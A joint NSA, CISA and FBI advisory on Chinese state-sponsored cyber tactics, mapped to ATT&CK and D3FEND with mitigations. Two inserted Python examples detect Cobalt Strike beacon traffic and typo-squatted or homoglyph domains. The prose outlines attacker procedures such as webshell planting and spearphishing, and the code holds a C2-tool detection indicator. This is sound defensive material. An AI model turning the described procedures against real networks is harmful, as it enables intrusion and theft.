### Summary
_This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 9, and MITRE D3FEND™ framework, version 0.9.2-BETA-3. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques and the [D3FEND framework](<https://d3fend.mitre.org/>) for referenced defensive tactics and techniques._
The National Security Agency, Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI) assess that People’s Republic of China state-sponsored malicious cyber activity is a major threat to U.S. and Allied cyberspace assets. Chinese state-sponsored cyber actors aggressively target U.S. and allied political, economic, military, educational, and critical infrastructure (CI) personnel and organizations to steal sensitive data, critical and emerging key technologies, intellectual property, and personally identifiable information (PII). Some target sectors include managed service providers, semiconductor companies, the Defense Industrial Base (DIB), universities, and medical institutions. These cyber operations support China’s long-term economic and military development objectives.
This Joint Cybersecurity Advisory (CSA) provides information on tactics, techniques, and procedures (TTPs) used by Chinese state-sponsored cyber actors. This advisory builds on previous NSA, CISA, and FBI reporting to inform federal, state, local, tribal, and territorial (SLTT) government, CI, DIB, and private industry organizations about notable trends and persistent TTPs through collaborative, proactive, and retrospective analysis.
To increase the defensive posture of their critical networks and reduce the risk of Chinese malicious cyber activity, NSA, CISA, and FBI urge government, CI, DIB, and private industry organizations to apply the recommendations listed in the Mitigations section of this advisory and in Appendix A: Chinese State-sponsored Cyber Actors' Observed Procedures. **Note:** NSA, CISA, and FBI encourage organization leaders to review [CISA Joint Insights: Chinese Malicious Cyber Activity: Threat Overview for Leaders](<https://www.cisa.gov/publication/chinese-cyber-threat-overview-and-actions-leaders>) for information on this threat to their organization.
[Click here](<https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF>) for a PDF version of this report.
### Technical Details
#### **Trends in Chinese State-Sponsored Cyber Operations**
NSA, CISA, and FBI have observed increasingly sophisticated Chinese state-sponsored cyber activity targeting U.S. political, economic, military, educational, and CI personnel and organizations. NSA, CISA, and FBI have identified the following trends in Chinese state-sponsored malicious cyber operations through proactive and retrospective analysis:
* **Acquisition of Infrastructure and Capabilities.** Chinese state-sponsored cyber actors remain agile and cognizant of the information security community’s practices. These actors make an effort to mask their activities by using a revolving series of virtual private servers (VPSs) and common open-source or commercial penetration tools.
* **Exploitation of Public Vulnerabilities.** Chinese state-sponsored cyber actors consistently scan target networks for critical and high vulnerabilities within days of the vulnerability’s public disclosure. In many cases, these cyber actors seek to exploit vulnerabilities in major applications, such as Pulse Secure, Apache, F5 Big-IP, and Microsoft products. For information on Common Vulnerabilities and Exposures (CVE) known to be exploited by malicious Chinese state-sponsored cyber actors, see:
  * CISA-FBI Joint CSA AA20-133A: [Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>),
  * CISA Activity Alert AA20-275A: [Potential for China Cyber Response to Heightened U.S.-China Tensions](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>), and
  * NSA CSA U/OO/179811-20: [Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>).
* **Encrypted Multi-Hop Proxies.** Chinese state-sponsored cyber actors have been routinely observed using a VPS as an encrypted proxy. The cyber actors use the VPS as well as small office and home office (SOHO) devices as operational nodes to evade detection.
#### **Observed Tactics and Techniques**
Chinese state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest worldwide and to acquire sensitive intellectual property, economic, political, and military information. Appendix B: MITRE ATT&CK Framework lists the tactics and techniques used by Chinese state-sponsored cyber actors. A downloadable [JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>) is also available on the [NSA Cybersecurity GitHub page](<https://github.com/nsacyber>).
Refer to Appendix A: Chinese State-Sponsored Cyber Actors’ Observed Procedures for information on procedures affiliated with these tactics and techniques as well as applicable mitigations.

_Figure 1: Example of tactics and techniques used in various cyber operations._
### Mitigations
NSA, CISA, and FBI urge federal and SLTT government, CI, DIB, and private industry organizations to apply the following recommendations as well as the detection and mitigation recommendations in Appendix A, which are tailored to observed tactics and techniques:
* **Patch systems and equipment promptly and diligently.** Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally facing equipment and CVEs known to be exploited by Chinese state-sponsored cyber actors. Consider implementing a patch management program that enables a timely and thorough patching cycle. **Note:** for more information on CVEs routinely exploited by Chinese state-sponsored cyber actors, refer to the resources listed in the Trends in Chinese State-Sponsored Cyber Operations section.
* **Enhance monitoring of network traffic, email, and endpoint systems.** Review network signatures and indicators for focused activities, monitor for new phishing themes, and adjust email rules accordingly. Follow the best practices of restricting attachments via email and blocking URLs and domains based upon reputation. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. Monitor common ports and protocols for command and control (C2) activity. SSL/TLS inspection can be used to see the contents of encrypted sessions to look for network-based indicators of malware communication protocols. Implement and enhance network and endpoint event analysis and detection capabilities to identify initial infections, compromised credentials, and the manipulation of endpoint processes and files.
* **Use protection capabilities to stop malicious activity.** Implement anti-virus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use a network intrusion detection and prevention system to identify and prevent commonly employed adversarial malware and limit nefarious data transfers. Use a domain reputation service to detect suspicious or malicious domains. Use strong credentials for service accounts and multi-factor authentication (MFA) for remote access to mitigate an adversary's ability to leverage stolen credentials, but be aware of MFA interception techniques for some MFA implementations.
### Resources
Refer to [us-cert.cisa.gov/china](<https://us-cert.cisa.gov/china>), <https://www.ic3.gov/Home/IndustryAlerts>, and [https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/](<https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/>) for previous reporting on Chinese state-sponsored malicious cyber activity.
### Disclaimer of Endorsement
The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.
### Purpose
This document was developed by NSA, CISA, and FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see [http://www.us-cert.gov/tlp/](<http://www.us-cert.gov/tlp/>).
### Trademark Recognition
* MITRE and ATT&CK are registered trademarks of The MITRE Corporation.
* D3FEND is a trademark of The MITRE Corporation.
* Microsoft, Microsoft Exchange, Office 365, Microsoft Office, OneDrive, Outlook, OWA, PowerShell, Windows Defender, and Windows are registered trademarks of Microsoft Corporation.
* Pulse Secure is a registered trademark of Pulse Secure, LLC.
* Apache is a registered trademark of Apache Software Foundation.
* F5 and BIG-IP are registered trademarks of F5 Networks.
* Cobalt Strike is a registered trademark of Strategic Cyber LLC.
* GitHub is a registered trademark of GitHub, Inc.
* JavaScript is a registered trademark of Oracle Corporation.
* Python is a registered trademark of Python Software Foundation.
* Unix is a registered trademark of The Open Group.
* Linux is a registered trademark of Linus Torvalds.
* Dropbox is a registered trademark of Dropbox, Inc.
### APPENDIX A: Chinese State-Sponsored Cyber Actors’ Observed Procedures
**Note:** D3FEND techniques are based on the Threat Actor Procedure(s) and may not match automated mappings to ATT&CK techniques and sub-techniques.
### Tactics: _Reconnaissance_ [[TA0043](<https://attack.mitre.org/versions/v9/tactics/TA0043>)]
_Table I: Chinese state-sponsored cyber actors’ Reconnaissance TTPs with detection and mitigation recommendations_
Each entry below lists the threat actor technique / sub-techniques, the threat actor procedure(s), detection and mitigation recommendations, and defensive tactics and techniques.
**Threat Actor Technique / Sub-Techniques:** Active Scanning [[T1595](<https://attack.mitre.org/versions/v9/techniques/T1595>)]; Gather Victim Network Information [[T1590](<https://attack.mitre.org/versions/v9/techniques/T1590>)]
**Threat Actor Procedure(s):** Chinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft® 365 (M365), formerly Office® 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python® scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization’s fully qualified domain name, IP address space, and open ports to target or exploit.
**Detection and Mitigation Recommendations:** Minimize the amount and sensitivity of data available to external parties, for example:
* Scrub user email addresses and contact lists from public websites, which can be used for social engineering,
* Share only necessary data and information with third parties, and
* Monitor and limit third-party access to the network.

Active scanning from cyber actors may be identified by monitoring network traffic for sources associated with botnets, adversaries, and known bad IPs based on threat intelligence.
**Defensive Tactics and Techniques:**
Detect:
* Network Traffic Analysis
  * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]
Isolate:
* Network Isolation
  * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]

### Tactics: _Resource Development_ [[TA0042](<https://attack.mitre.org/versions/v9/tactics/TA0042>)]
_Table II: Chinese state-sponsored cyber actors’ Resource Development TTPs with detection and mitigation recommendations_
Each entry below lists the threat actor technique / sub-techniques, the threat actor procedure(s), detection and mitigation recommendations, and defensive tactics and techniques.
**Threat Actor Technique / Sub-Techniques:** Acquire Infrastructure [[T1583](<https://attack.mitre.org/versions/v9/techniques/T1583>)]; Stage Capabilities [[T1608](<https://attack.mitre.org/versions/v9/techniques/T1608>)]
**Threat Actor Procedure(s):** Chinese state-sponsored cyber actors have been observed using VPSs from cloud service providers that are physically distributed around the world to host malware and function as C2 nodes.
**Detection and Mitigation Recommendations:** Adversary activities occurring outside the organization’s boundary of control and view make mitigation difficult. Organizations can monitor for unexpected network traffic and data flows to and from VPSs and correlate other suspicious activity that may indicate an active threat.
**Defensive Tactics and Techniques:** N/A

**Threat Actor Technique / Sub-Techniques:** Obtain Capabilities [[T1588](<https://attack.mitre.org/versions/v9/techniques/T1588>)]:
* Tools [[T1588.002](<https://attack.mitre.org/versions/v9/techniques/T1588/002>)]
**Threat Actor Procedure(s):** Chinese state-sponsored cyber actors have been observed using Cobalt Strike® and tools from GitHub® on victim networks.
**Detection and Mitigation Recommendations:** Organizations may be able to identify malicious use of Cobalt Strike by:
* Examining network traffic using Transport Layer Security (TLS) inspection to identify Cobalt Strike. Look for human-generated versus machine-generated traffic; machine-generated traffic will be more uniformly distributed.
* Looking for the default Cobalt Strike TLS certificate.
* Looking at the user agent that generates the TLS traffic for discrepancies that may indicate faked and malicious traffic.
* Reviewing the traffic destination domain, which may be malicious and an indicator of compromise.
* Looking at the packet's HTTP host header. If it does not match the destination domain, it may indicate a fake Cobalt Strike header and profile.
* Checking the Uniform Resource Identifier (URI) of the flow to see if it matches one associated with Cobalt Strike's malleable C2 language. If discovered, additional recovery and investigation will be required.
**Defensive Tactics and Techniques:** N/A

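As an added example that is not part of the advisory, the following Python script triages TLS/HTTP flow records for three of the Cobalt Strike checks listed above: a Host header that does not match the destination domain, the default self-signed certificate subject, and connection timing too regular to be human-generated. The flow records, addresses and domains are constructed, and the certificate subject is the widely documented default that a real deployment would populate from threat intelligence rather than hard-code.

```python
"""Triage constructed TLS/HTTP flow records for three Cobalt Strike indicators:
HTTP Host header not matching the destination domain, the default self-signed
certificate subject, and machine-like (uniformly spaced) connection timing.
Constructed sample data only; no real captures."""
from collections import defaultdict
from statistics import mean, pstdev

# Widely documented subject of Cobalt Strike's default self-signed TLS certificate.
# Keep this as a watchlist populated from threat intelligence, not a single constant.
DEFAULT_CERT_SUBJECTS = {
    "CN=Major Cobalt Strike,OU=AdvancedPenTesting,O=cobaltstrike,"
    "L=Somewhere,ST=Cyberspace,C=Earth",
}
MIN_CONNECTIONS = 5          # fewer connections is too little to judge timing
MAX_CV_MACHINE_LIKE = 0.15   # stdev/mean of gaps below this is "too regular for a human"


def normalize_host(value):
    """Lower-case a host name, drop any :port suffix and trailing dot."""
    return value.strip().lower().split(":", 1)[0].rstrip(".")


def host_header_mismatch(flow):
    """True when the HTTP Host header names a different site than the destination domain."""
    host = flow.get("http_host")
    if not host:
        return False
    return normalize_host(host) != normalize_host(flow["dst_domain"])


def uses_default_cert(flow):
    """True when the server certificate subject is on the default-certificate watchlist."""
    subject = flow.get("cert_subject", "").replace(", ", ",")
    return subject in DEFAULT_CERT_SUBJECTS


def interval_cv(timestamps):
    """Coefficient of variation of inter-arrival gaps, or None if too few samples."""
    if len(timestamps) < MIN_CONNECTIONS:
        return None
    ordered = sorted(timestamps)
    gaps = [later - earlier for earlier, later in zip(ordered, ordered[1:])]
    avg = mean(gaps)
    return None if avg == 0 else pstdev(gaps) / avg


def triage(flows):
    """Return sorted, de-duplicated (src_ip, dst_domain, reason) findings."""
    findings = set()
    by_pair = defaultdict(list)
    for flow in flows:
        key = (flow["src_ip"], flow["dst_domain"])
        by_pair[key].append(flow["ts"])
        if host_header_mismatch(flow):
            findings.add(key + ("host-header-mismatch",))
        if uses_default_cert(flow):
            findings.add(key + ("default-cobalt-strike-cert",))
    for key, stamps in by_pair.items():
        cv = interval_cv(stamps)
        if cv is not None and cv < MAX_CV_MACHINE_LIKE:
            findings.add(key + ("machine-like-beacon-timing",))
    return sorted(findings)


def make_flow(ts, src_ip, dst_domain, http_host, cert_subject):
    """Build one flow record (timestamps in seconds)."""
    return {"ts": ts, "src_ip": src_ip, "dst_domain": dst_domain,
            "http_host": http_host, "cert_subject": cert_subject}


# Constructed sample data (RFC 5737 addresses, reserved example domains): a user
# browsing with irregular timing, and a host checking in every 60 seconds with a
# mismatched Host header and the default certificate.
BENIGN_CERT = "CN=www.example.com, O=Example Corp, C=US"
SUSPECT_CERT = ("CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, "
                "L=Somewhere, ST=Cyberspace, C=Earth")
SAMPLE_FLOWS = (
    [make_flow(t, "192.0.2.10", "www.example.com", "www.example.com", BENIGN_CERT)
     for t in (0, 7, 31, 95, 112, 240)]
    + [make_flow(t, "192.0.2.23", "cdn-sync.example.net", "www.example.com", SUSPECT_CERT)
       for t in (0, 60, 120, 180, 240, 300)]
)

if __name__ == "__main__":
    for src, dst, reason in triage(SAMPLE_FLOWS):
        print(f"{src} -> {dst}: {reason}")
```

The user-agent and URI checks from the list above are left to a threat-intelligence feed, since their patterns change with the operator's profile.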
### Tactics: _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v9/tactics/TA0001/>)]
_Table III: Chinese state-sponsored cyber actors’ Initial Access TTPs with detection and mitigation recommendations_
Each entry below lists the threat actor technique / sub-techniques, the threat actor procedure(s), detection and mitigation recommendations, and defensive tactics and techniques.
**Threat Actor Technique / Sub-Techniques:** Drive By Compromise [[T1189](<https://attack.mitre.org/versions/v9/techniques/T1189>)]
**Threat Actor Procedure(s):** Chinese state-sponsored cyber actors have been observed gaining access to victim networks through watering hole campaigns of typo-squatted domains.
**Detection and Mitigation Recommendations:**
* Ensure all browsers and plugins are kept up to date.
* Use modern browsers with security features turned on.
* Restrict the use of unneeded websites, block unneeded downloads/attachments, block unneeded JavaScript®, restrict browser extensions, etc.
* Use adblockers to help prevent malicious code served through advertisements from executing.
* Use script blocking extensions to help prevent the execution of unneeded JavaScript, which may be used during exploitation processes.
* Use browser sandboxes or remote virtual environments to mitigate browser exploitation.
* Use security applications that look for behavior used during exploitation, such as Windows Defender® Exploit Guard (WDEG).
**Defensive Tactics and Techniques:**
Detect:
* Identifier Analysis
  * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]
  * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]
* File Analysis
  * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]
Isolate:
* Execution Isolation
  * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]
  * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]
* Network Isolation
  * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)]
  * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)]

**Threat Actor Technique / Sub-Techniques:** Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)]
**Threat Actor Procedure(s):** Chinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems.[[1](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html%20>)] For information on vulnerabilities known to be exploited by Chinese state-sponsored cyber actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources.
Chinese state-sponsored cyber actors have also been observed:
* Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange® Outlook Web Access (OWA®) and plant webshells.
* Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources.
* Deploying a public proof of concept (POC) exploit targeting a public-facing appliance vulnerability.
**Detection and Mitigation Recommendations:** Review previously published alerts and advisories from NSA, CISA, and FBI, and diligently patch vulnerable applications known to be exploited by cyber actors. Refer to the Trends in Chinese State-Sponsored Cyber Operations section for a non-inclusive list of resources.
Additional mitigations include:
* Consider implementing Web Application Firewalls (WAF), which can prevent exploit traffic from reaching an application.
* Segment externally facing servers and services from the rest of the network with a demilitarized zone (DMZ).
* Use multi-factor authentication (MFA) with strong factors and require regular re-authentication.
* Disable protocols using weak authentication.
* Limit access to and between cloud resources with the desired state being a Zero Trust model. For more information refer to NSA Cybersecurity Information Sheet: [[Embracing a Zero Trust Security Model](<https://media.defense.gov/2021/Feb/25/2002588479/-1/-1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF>)].
* When possible, use cloud-based access controls on cloud resources (e.g., cloud service provider (CSP)-managed authentication between virtual machines).
* Use automated tools to audit access logs for security concerns.
* Where possible, enforce MFA for password resets.
* Do not include Application Programming Interface (API) keys in software version control systems where they can be unintentionally leaked.
**Defensive Tactics and Techniques:**
Harden:
* Application Hardening [[D3-AH](<https://d3fend.mitre.org/technique/d3f:ApplicationHardening>)]
* Platform Hardening
  * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]
Detect:
* File Analysis [[D3-FA](<https://d3fend.mitre.org/technique/d3f:FileAnalysis>)]
* Network Traffic Analysis
  * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]
* Process Analysis
  * Process Spawn Analysis
    * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]
Isolate:
* Network Isolation
  * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]

**Threat Actor Technique / Sub-Techniques:** Phishing [[T1566](<https://attack.mitre.org/versions/v9/techniques/T1566>)]:
* Spearphishing Attachment [[T1566.001](<https://attack.mitre.org/versions/v9/techniques/T1566/001>)]
* Spearphishing Link [[T1566.002](<https://attack.mitre.org/versions/v9/techniques/T1566/002>)]
**Threat Actor Procedure(s):** Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns. These email compromise attempts range from generic emails with mass targeted phishing attempts to specifically crafted emails in targeted social engineering lures.
These compromise attempts use the cyber actors’ dynamic collection of VPSs, previously compromised accounts, or other infrastructure in order to encourage engagement from the target audience through domain typo-squatting and masquerading. These emails may contain a malicious link or files that will provide the cyber actor access to the victim’s device after the user clicks on the malicious link or opens the attachment.
**Detection and Mitigation Recommendations:**
* Implement a user training program and simulated spearphishing emails to discourage users from visiting malicious websites or opening malicious attachments and reinforce the appropriate user responses to spearphishing emails. Quarantine suspicious files with antivirus solutions.
* Use a network intrusion prevention system (IPS) to scan and remove malicious email attachments.
* Block uncommon file types in emails that are not needed by general users (`.exe`, `.jar`, `.vbs`).
* Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using Sender Policy Framework [SPF]) and integrity of messages (using Domain Keys Identified Mail [DKIM]). Enabling these mechanisms within an organization (through policies such as Domain-based Message Authentication, Reporting, and Conformance [DMARC]) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.
* Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.
* Prevent users from clicking on malicious links by stripping hyperlinks or implementing "URL defanging" at the Email Security Gateway or other email security tools.
* Add external sender banners to emails to alert users that the email came from an external sender.
**Defensive Tactics and Techniques:**
Harden:
* Message Hardening
  * Message Authentication [[D3-MAN](<https://d3fend.mitre.org/technique/d3f:MessageAuthentication>)]
  * Transfer Agent Authentication [[D3-TAAN](<https://d3fend.mitre.org/technique/d3f:TransferAgentAuthentication>)]
Detect:
* File Analysis
  * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]
* Identifier Analysis
  * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]
  * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]
* Message Analysis
  * Sender MTA Reputation Analysis [[D3-SMRA](<https://d3fend.mitre.org/technique/d3f:SenderMTAReputationAnalysis>)]
  * Sender Reputation Analysis [[D3-SRA](<https://d3fend.mitre.org/technique/d3f:SenderReputationAnalysis>)]

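As an added example (not from the advisory) serving both the typo-squatted watering-hole domains under Drive By Compromise and the domain typo-squatting and masquerading described for Phishing, this Python module classifies domains pulled from proxy, DNS or mail logs against an organization's own domains using homoglyph skeletons and edit distance, the Homoglyph Detection [D3-HD] and URL Analysis [D3-UA] techniques listed in both entries. `example.com` and the look-alike domains are constructed; the confusables table is a small subset that a production deployment would extend from the Unicode confusables data.

```python
"""Classify domains seen in proxy, DNS or mail logs against an organization's
own domains: homoglyph look-alikes (D3-HD), single-edit typo-squats and
transpositions, TLD variants, and brand names embedded in a longer label
(D3-UA).  All domains below are constructed examples."""
import unicodedata

# Single characters commonly used to imitate ASCII letters (subset; extend from the
# Unicode confusables data for production use).
HOMOGLYPHS = {
    "0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "@": "a", "$": "s",
    "\u03bf": "o",  # Greek small omicron
    "\u0430": "a",  # Cyrillic small a
    "\u0435": "e",  # Cyrillic small ie
    "\u043e": "o",  # Cyrillic small o
    "\u0440": "p",  # Cyrillic small er
    "\u0441": "c",  # Cyrillic small es
    "\u0456": "i",  # Cyrillic small byelorussian-ukrainian i
}
# Two-letter sequences that read as one letter in many fonts.
MULTI_GLYPHS = {"rn": "m", "vv": "w"}


def skeleton(label):
    """Collapse a label to a canonical form so look-alikes compare equal."""
    label = unicodedata.normalize("NFKC", label).lower()
    for seq, repl in MULTI_GLYPHS.items():
        label = label.replace(seq, repl)
    return "".join(HOMOGLYPHS.get(ch, ch) for ch in label)


def osa_distance(a, b):
    """Optimal string alignment distance: edits plus adjacent transpositions."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def decode_idna(domain):
    """Turn punycode labels (xn--...) back into Unicode so homoglyphs are visible."""
    try:
        return domain.encode("ascii").decode("idna")
    except (UnicodeError, ValueError):
        return domain


def registrable_part(domain):
    """Naive (second-level label, TLD) split; use a public-suffix list in production."""
    labels = decode_idna(domain.lower().rstrip(".")).split(".")
    sld = labels[-2] if len(labels) >= 2 else labels[0]
    return sld, labels[-1]


def classify(domain, protected, max_distance=1):
    """Verdict for `domain` relative to the organization's `protected` domains."""
    domain = domain.lower().rstrip(".")
    if domain in protected or any(domain.endswith("." + p) for p in protected):
        return "legitimate"
    sld, tld = registrable_part(domain)
    for p in sorted(protected):
        psld, ptld = registrable_part(p)
        if sld == psld and tld != ptld:
            return f"tld-variant-of:{p}"
        if sld != psld and skeleton(sld) == psld:
            return f"homoglyph-of:{p}"
        if osa_distance(sld, psld) <= max_distance:
            return f"typosquat-of:{p}"
        if psld in sld:
            return f"brand-embedded-in:{p}"
    return "unrelated"


# Constructed sample: the organization's domain and a few observed domains.
PROTECTED = {"example.com"}
OBSERVED = ["example.com", "mail.example.com", "examp1e.com", "exarnple.com",
            "ex\u0430mple.com", "exmaple.com", "example.co", "example-login.com",
            "github.com"]

if __name__ == "__main__":
    for name in OBSERVED:
        print(f"{name:22} {classify(name, PROTECTED)}")
```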
**Threat Actor Technique / Sub-Techniques:** External Remote Services [[T1133](<https://attack.mitre.org/versions/v9/techniques/T1133>)]
**Threat Actor Procedure(s):** Chinese state-sponsored cyber actors have been observed:
* Exploiting vulnerable devices immediately after conducting scans for critical zero-day or publicly disclosed vulnerabilities. The cyber actors used or modified public proof of concept code in order to exploit vulnerable systems.
* Targeting Microsoft Exchange offline address book (OAB) virtual directories (VDs).
* Exploiting Internet accessible webservers using webshell small code injections against multiple code languages, including `net`, `asp`, `aspx`, `php`, `jspx`, and `cfm`.
**Note:** refer to the references listed above in Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)] for information on CVEs known to be exploited by malicious Chinese cyber actors.
**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)].
**Detection and Mitigation Recommendations:**
* Many exploits can be mitigated by applying available patches for vulnerabilities (such as CVE-2019-11510, CVE-2019-19781, and CVE-2020-5902) affecting external remote services.
* Reset credentials after virtual private network (VPN) devices are upgraded and reconnected to the external network.
* Revoke and generate new VPN server keys and certificates (this may require redistributing VPN connection information to users).
* Disable Remote Desktop Protocol (RDP) if not required for legitimate business functions.
* Restrict VPN traffic to and from managed service providers (MSPs) using a dedicated VPN connection.
* Review and verify all connections between customer systems, service provider systems, and other client enclaves.
**Defensive Tactics and Techniques:**
Harden:
* Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]
Detect:
* Network Traffic Analysis
  * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]
* Platform Monitoring [[D3-PM](<https://d3fend.mitre.org/technique/d3f:PlatformMonitoring>)]
* Process Analysis
  * Process Spawn Analysis [[D3-SPA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
  * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]

**Threat Actor Technique / Sub-Techniques:** Valid Accounts [[T1078](<https://attack.mitre.org/versions/v9/techniques/T1078>)]:
* Default Accounts [[T1078.001](<https://attack.mitre.org/versions/v9/techniques/T1078/001>)]
* Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v9/techniques/T1078/002>)]
**Threat Actor Procedure(s):** Chinese state-sponsored cyber actors have been observed gaining credential access to victim networks by using legitimate but compromised credentials to access OWA servers, corporate login portals, and victim networks.
**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)], Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)], and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].
**Detection and Mitigation Recommendations:**
* Adhere to best practices for password and permission management.
* Ensure that MSP accounts are not assigned to administrator groups and restrict those accounts to only the systems they manage.
* Do not store credentials or sensitive data in plaintext.
* Change all default usernames and passwords.
* Routinely update and secure applications using Secure Shell (SSH).
* Update SSH keys regularly and keep private keys secure.
* Routinely audit privileged accounts to identify malicious use.
**Defensive Tactics and Techniques:**
Harden:
* Credential Hardening
  * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]
Detect:
* User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]
  * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)]
  * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)]

### Tactics: _Execution_ [[TA0002](<https://attack.mitre.org/versions/v9/tactics/TA0002>)]
_Table IV: Chinese state-sponsored cyber actors’ Execution TTPs with detection and mitigation recommendations_
Each entry below lists the threat actor technique / sub-techniques, the threat actor procedure(s), detection and mitigation recommendations, and defensive tactics and techniques.
**Threat Actor Technique / Sub-Techniques:** Command and Scripting Interpreter [[T1059](<https://attack.mitre.org/versions/v9/techniques/T1059>)]:
* PowerShell® [[T1059.001](<https://attack.mitre.org/versions/v9/techniques/T1059/001>)]
* Windows® Command Shell [[T1059.003](<https://attack.mitre.org/versions/v9/techniques/T1059/003>)]
* Unix® Shell [[T1059.004](<https://attack.mitre.org/versions/v9/techniques/T1059/004>)]
* Python [[T1059.006](<https://attack.mitre.org/versions/v9/techniques/T1059/006>)]
